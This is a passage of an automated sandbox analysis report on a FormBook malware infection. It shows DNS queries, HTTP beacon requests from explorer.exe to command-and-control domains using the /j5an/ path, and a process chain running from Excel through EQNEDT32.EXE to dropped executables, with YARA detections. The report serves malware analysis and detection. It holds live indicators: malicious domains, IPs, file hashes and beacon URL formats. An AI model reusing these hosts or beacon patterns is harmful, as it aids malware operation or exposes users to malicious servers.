                                                                                                                                                                                                            Jan 27, 2021 07:18:31.398339987 CET8049170104.21.47.75192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:18:31.398753881 CET4917080192.168.2.22104.21.47.75
                                                                                                                                                                                                            Jan 27, 2021 07:18:31.398870945 CET4917080192.168.2.22104.21.47.75
                                                                                                                                                                                                            Jan 27, 2021 07:18:31.444581985 CET8049170104.21.47.75192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:18:36.824510098 CET4917180192.168.2.22103.209.233.78
                                                                                                                                                                                                            Jan 27, 2021 07:18:37.134531021 CET8049171103.209.233.78192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:18:37.134674072 CET4917180192.168.2.22103.209.233.78
                                                                                                                                                                                                            Jan 27, 2021 07:18:37.134948015 CET4917180192.168.2.22103.209.233.78
                                                                                                                                                                                                            Jan 27, 2021 07:18:37.445503950 CET8049171103.209.233.78192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:18:37.445544958 CET8049171103.209.233.78192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:18:37.445561886 CET8049171103.209.233.78192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:18:37.446003914 CET4917180192.168.2.22103.209.233.78
                                                                                                                                                                                                            Jan 27, 2021 07:18:37.446089983 CET4917180192.168.2.22103.209.233.78
                                                                                                                                                                                                            Jan 27, 2021 07:18:37.759622097 CET8049171103.209.233.78192.168.2.22

                                                                                                                                                                                                            UDP Packets

                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.324239016 CET5219753192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.372081041 CET53521978.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.372427940 CET5219753192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.420120955 CET53521978.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:17:46.161165953 CET5309953192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 27, 2021 07:17:46.307773113 CET53530998.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:17:56.738931894 CET5283853192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 27, 2021 07:17:57.100617886 CET53528388.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:18:02.556963921 CET6120053192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 27, 2021 07:18:02.707968950 CET53612008.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:18:08.064954996 CET4954853192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 27, 2021 07:18:08.495318890 CET53495488.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:18:13.514302015 CET5562753192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 27, 2021 07:18:13.589848042 CET53556278.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:18:20.913451910 CET5600953192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 27, 2021 07:18:20.997838020 CET53560098.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:18:26.130702972 CET6186553192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 27, 2021 07:18:26.221211910 CET53618658.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:18:31.230568886 CET5517153192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 27, 2021 07:18:31.293970108 CET53551718.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:18:36.463534117 CET5249653192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 27, 2021 07:18:36.822276115 CET53524968.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:18:42.442558050 CET5756453192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 27, 2021 07:18:42.506495953 CET53575648.8.8.8192.168.2.22

                                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.324239016 CET192.168.2.228.8.8.80x659bStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.372427940 CET192.168.2.228.8.8.80x659bStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:17:46.161165953 CET192.168.2.228.8.8.80xa14dStandard query (0)www.land-il.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:17:56.738931894 CET192.168.2.228.8.8.80xccffStandard query (0)www.fsjinhua.netA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:18:02.556963921 CET192.168.2.228.8.8.80x2f03Standard query (0)www.chenangopistolpermit.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:18:08.064954996 CET192.168.2.228.8.8.80x3c4eStandard query (0)www.chuanxingtong.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:18:13.514302015 CET192.168.2.228.8.8.80x6ec7Standard query (0)www.aulbalu.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:18:20.913451910 CET192.168.2.228.8.8.80xf09aStandard query (0)www.streamelemeants.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:18:26.130702972 CET192.168.2.228.8.8.80x18f7Standard query (0)www.dchasers.netA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:18:31.230568886 CET192.168.2.228.8.8.80x4b93Standard query (0)www.mct.ltdA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:18:36.463534117 CET192.168.2.228.8.8.80x9e1cStandard query (0)www.bmtxm.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:18:42.442558050 CET192.168.2.228.8.8.80xa0e8Standard query (0)www.aspiringeyephotos.comA (IP address)IN (0x0001)

                                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.372081041 CET8.8.8.8192.168.2.220x659bNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.372081041 CET8.8.8.8192.168.2.220x659bNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.372081041 CET8.8.8.8192.168.2.220x659bNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.372081041 CET8.8.8.8192.168.2.220x659bNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.372081041 CET8.8.8.8192.168.2.220x659bNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.420120955 CET8.8.8.8192.168.2.220x659bNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.420120955 CET8.8.8.8192.168.2.220x659bNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.420120955 CET8.8.8.8192.168.2.220x659bNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.420120955 CET8.8.8.8192.168.2.220x659bNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.420120955 CET8.8.8.8192.168.2.220x659bNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:17:46.307773113 CET8.8.8.8192.168.2.220xa14dNo error (0)www.land-il.comland-il.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:17:46.307773113 CET8.8.8.8192.168.2.220xa14dNo error (0)land-il.com50.87.169.249A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:17:57.100617886 CET8.8.8.8192.168.2.220xccffNo error (0)www.fsjinhua.net23.228.109.141A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:18:02.707968950 CET8.8.8.8192.168.2.220x2f03No error (0)www.chenangopistolpermit.com208.92.209.208A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:18:08.495318890 CET8.8.8.8192.168.2.220x3c4eName error (3)www.chuanxingtong.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:18:13.589848042 CET8.8.8.8192.168.2.220x6ec7Name error (3)www.aulbalu.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:18:20.997838020 CET8.8.8.8192.168.2.220xf09aNo error (0)www.streamelemeants.com81.17.18.195A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:18:26.221211910 CET8.8.8.8192.168.2.220x18f7Name error (3)www.dchasers.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:18:31.293970108 CET8.8.8.8192.168.2.220x4b93No error (0)www.mct.ltd104.21.47.75A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:18:31.293970108 CET8.8.8.8192.168.2.220x4b93No error (0)www.mct.ltd172.67.170.169A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:18:36.822276115 CET8.8.8.8192.168.2.220x9e1cNo error (0)www.bmtxm.com103.209.233.78A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:18:42.506495953 CET8.8.8.8192.168.2.220xa0e8No error (0)www.aspiringeyephotos.comaspiringeyephotos.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                            Jan 27, 2021 07:18:42.506495953 CET8.8.8.8192.168.2.220xa0e8No error (0)aspiringeyephotos.com34.102.136.180A (IP address)IN (0x0001)

                                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                                            • www.land-il.com
                                                                                                                                                                                                            • www.fsjinhua.net
                                                                                                                                                                                                            • www.chenangopistolpermit.com
                                                                                                                                                                                                            • www.streamelemeants.com
                                                                                                                                                                                                            • www.mct.ltd
                                                                                                                                                                                                            • www.bmtxm.com

                                                                                                                                                                                                            HTTP Packets

                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                            0192.168.2.224916650.87.169.24980C:\Windows\explorer.exe
                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                            Jan 27, 2021 07:17:46.510798931 CET818OUTGET /j5an/?3fk=jkLgRzxvTxu7277EKfJN7tKRHYJxZ3c6o/hCpD9wXnjOSj4zaLYT7gQTd+fjCtE9cXdA/Q==&9rO4=E4xhcD5XlJSXW HTTP/1.1
                                                                                                                                                                                                            Host: www.land-il.com
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            Jan 27, 2021 07:17:46.720585108 CET819INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Date: Wed, 27 Jan 2021 06:17:46 GMT
                                                                                                                                                                                                            Server: nginx/1.19.5
                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                            Content-Length: 315
                                                                                                                                                                                                            host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                            1192.168.2.224916723.228.109.14180C:\Windows\explorer.exe
                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                            Jan 27, 2021 07:17:57.296983957 CET819OUTGET /j5an/?3fk=BfKEObTbW9oeHG2CUMZ3KrmdYmDHtBO1kpWmA720me2b6REnQWjK/QX53PULeTYyqxmJdg==&9rO4=E4xhcD5XlJSXW HTTP/1.1
                                                                                                                                                                                                            Host: www.fsjinhua.net
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            Jan 27, 2021 07:17:57.535023928 CET820INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Wed, 27 Jan 2021 06:17:57 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            X-Powered-By: PHP/7.0.33
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                            2192.168.2.2249168208.92.209.20880C:\Windows\explorer.exe
                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                            Jan 27, 2021 07:18:02.882548094 CET821OUTGET /j5an/?3fk=D+cSBfecKrY0H0Gt53ME+eVK9rvQq54hSBUKdB1Y0k0nsfYDitv2SyHvmR9bpLZA/9+mqA==&9rO4=E4xhcD5XlJSXW HTTP/1.1
                                                                                                                                                                                                            Host: www.chenangopistolpermit.com
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            Jan 27, 2021 07:18:03.057116985 CET821INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Location: https://chenangopistolpermit.com/j5an/?3fk=D+cSBfecKrY0H0Gt53ME+eVK9rvQq54hSBUKdB1Y0k0nsfYDitv2SyHvmR9bpLZA/9+mqA==&9rO4=E4xhcD5XlJSXW
                                                                                                                                                                                                            Server: Microsoft-IIS/10.0
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                            Date: Wed, 27 Jan 2021 06:17:57 GMT
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Content-Length: 261
                                                                                                                                                                                                            Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 63 68 65 6e 61 6e 67 6f 70 69 73 74 6f 6c 70 65 72 6d 69 74 2e 63 6f 6d 2f 6a 35 61 6e 2f 3f 33 66 6b 3d 44 2b 63 53 42 66 65 63 4b 72 59 30 48 30 47 74 35 33 4d 45 2b 65 56 4b 39 72 76 51 71 35 34 68 53 42 55 4b 64 42 31 59 30 6b 30 6e 73 66 59 44 69 74 76 32 53 79 48 76 6d 52 39 62 70 4c 5a 41 2f 39 2b 6d 71 41 3d 3d 26 61 6d 70 3b 39 72 4f 34 3d 45 34 78 68 63 44 35 58 6c 4a 53 58 57 22 3e 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e
                                                                                                                                                                                                            Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://chenangopistolpermit.com/j5an/?3fk=D+cSBfecKrY0H0Gt53ME+eVK9rvQq54hSBUKdB1Y0k0nsfYDitv2SyHvmR9bpLZA/9+mqA==&amp;9rO4=E4xhcD5XlJSXW">here</a></body>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                            3192.168.2.224916981.17.18.19580C:\Windows\explorer.exe
                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                            Jan 27, 2021 07:18:21.049287081 CET822OUTGET /j5an/?3fk=hrvp4+cUQU8zV/SJvc4Npds81eds1Wb4LfPiDx6kUcwrGKBrK/T3B2SdIv8rg9j1CS48fg==&9rO4=E4xhcD5XlJSXW HTTP/1.1
                                                                                                                                                                                                            Host: www.streamelemeants.com
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            Jan 27, 2021 07:18:21.128422022 CET823INHTTP/1.1 302 Found
                                                                                                                                                                                                            cache-control: max-age=0, private, must-revalidate
                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                            content-length: 11
                                                                                                                                                                                                            date: Wed, 27 Jan 2021 06:18:20 GMT
                                                                                                                                                                                                            location: http://survey-smiles.com
                                                                                                                                                                                                            server: nginx
                                                                                                                                                                                                            set-cookie: sid=741ca2b8-6067-11eb-a37f-ec1f2a5069bc; path=/; domain=.streamelemeants.com; expires=Mon, 14 Feb 2089 09:32:28 GMT; max-age=2147483647; HttpOnly
                                                                                                                                                                                                            Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                                                                                                                                                                                            Data Ascii: Redirecting


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                            4192.168.2.2249170104.21.47.7580C:\Windows\explorer.exe
                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                            Jan 27, 2021 07:18:31.342557907 CET824OUTGET /j5an/?3fk=jfM0s3t3pF6231rQ9Ypgo/tIMSV8ijVp9KulJ4ArWd+XWOyrlsks5AwgkklZ8lU5NlnM6w==&9rO4=E4xhcD5XlJSXW HTTP/1.1
                                                                                                                                                                                                            Host: www.mct.ltd
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            Jan 27, 2021 07:18:31.398302078 CET825INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Wed, 27 Jan 2021 06:18:31 GMT
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: max-age=3600
                                                                                                                                                                                                            Expires: Wed, 27 Jan 2021 07:18:31 GMT
                                                                                                                                                                                                            Location: https://www.mct.ltd/j5an/?3fk=jfM0s3t3pF6231rQ9Ypgo/tIMSV8ijVp9KulJ4ArWd+XWOyrlsks5AwgkklZ8lU5NlnM6w==&9rO4=E4xhcD5XlJSXW
                                                                                                                                                                                                            cf-request-id: 07e4176c5300000c1da19ab000000001
                                                                                                                                                                                                            Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=UpxZJuciyFuqiOzFaeL3RT79v%2FcXG2kZq0ISzB4S55IY5BHR75N9knX0tkw1rbTyKHlgv2k5pe546yp7Y38IzdcaI5d75Lu0NSioUQ%3D%3D"}],"max_age":604800}
                                                                                                                                                                                                            NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 61805b5a18320c1d-AMS
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                            5192.168.2.2249171103.209.233.7880C:\Windows\explorer.exe
                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                            Jan 27, 2021 07:18:37.134948015 CET826OUTGET /j5an/?3fk=6SPexGd0ZJ0Mz+FJ+cy7OLUKwTeaGjB/WusfxloW69kYZYqYrDfxiIlikZagIGHK+b+BQQ==&9rO4=E4xhcD5XlJSXW HTTP/1.1
                                                                                                                                                                                                            Host: www.bmtxm.com
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            Jan 27, 2021 07:18:37.445544958 CET826INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Wed, 27 Jan 2021 06:18:37 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 146
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                            HTTPS Packets

                                                                                                                                                                                                            TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                            Jan 27, 2021 07:16:56.540261030 CET162.159.130.233443192.168.2.2249165CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Jan 19 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Wed Jan 19 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                                                                                                                            CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

                                                                                                                                                                                                            Code Manipulations

                                                                                                                                                                                                            Statistics

                                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                            Behavior

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            System Behavior

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:07:15:53
                                                                                                                                                                                                            Start date:27/01/2021
                                                                                                                                                                                                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                                            Imagebase:0x13fe80000
                                                                                                                                                                                                            File size:27641504 bytes
                                                                                                                                                                                                            MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:07:16:13
                                                                                                                                                                                                            Start date:27/01/2021
                                                                                                                                                                                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:543304 bytes
                                                                                                                                                                                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:07:16:15
                                                                                                                                                                                                            Start date:27/01/2021
                                                                                                                                                                                                            Path:C:\Users\Public\vbc.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:772519 bytes
                                                                                                                                                                                                            MD5 hash:40BFB08CE97F3709F4DE7C6BA8B3401E
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:07:16:16
                                                                                                                                                                                                            Start date:27/01/2021
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p
                                                                                                                                                                                                            Imagebase:0xbd0000
                                                                                                                                                                                                            File size:893608 bytes
                                                                                                                                                                                                            MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2169563317.0000000000220000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2169563317.0000000000220000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2169563317.0000000000220000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 5%, Metadefender, Browse
                                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:07:16:16
                                                                                                                                                                                                            Start date:27/01/2021
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
